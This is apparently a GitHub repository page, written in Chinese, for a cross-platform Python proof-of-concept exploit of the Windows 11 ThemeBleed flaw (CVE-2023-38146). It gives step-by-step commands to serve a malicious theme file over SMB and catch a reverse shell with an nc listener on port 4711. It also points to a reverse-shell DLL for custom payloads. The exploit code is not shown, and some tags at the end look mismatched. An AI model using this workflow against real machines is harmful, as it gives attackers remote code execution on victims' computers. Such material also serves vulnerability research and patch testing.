CH0ico/CVE-2023-38146-Poc
GitHub: CH0ico/CVE-2023-38146-Poc
针对 Windows 11 ThemeBleed 漏洞(CVE-2023-38146)的跨平台 Python PoC 利用工具,通过恶意主题文件触发远程代码执行。
Stars: 0 | Forks: 0
# ThemeBleed CVE-2023-38146 漏洞利用 PoC (Windows 11 Themes)
深受 https://github.com/gabe-k/themebleed 的启发,该仓库只能在 Windows 上运行(这也是我决定编写此程序的原因)。
使用了来自 impacket smbserver.py 的修改代码 (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
有用的参考资料:https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
博客文章:
https://jnns.de/posts/cve-2023-38146-poc/
## 如何使用:
安装依赖项并运行应用程序:
```
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# 在另一个 shell 中启动 nc listener
rlwrap -cAr nc -lvnp 4711
```
在存在漏洞的机器上使用 "evil_theme.theme" 或 "evil_theme.themepack"。
大功告成!
## 自定义 DLL 文件:
将包含导出函数 "VerifyThemeVersion" 的 DLL 放在
"./td/" 文件夹中,并命名为 "Aero.msstyles_vrf_evil.dll"。你应该可以通过搜索引擎找到一个示例 DLL,或者使用我的示例 https://github.com/Jnnshschl/ThemeBleedReverseShellDLL。
```
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# 在另一个 shell 中启动 nc listener
rlwrap -cAr nc -lvnp 4711
```
标签:PoC, Python, SMB协议, XXE攻击, 无后门, 暴力破解, 逆向工具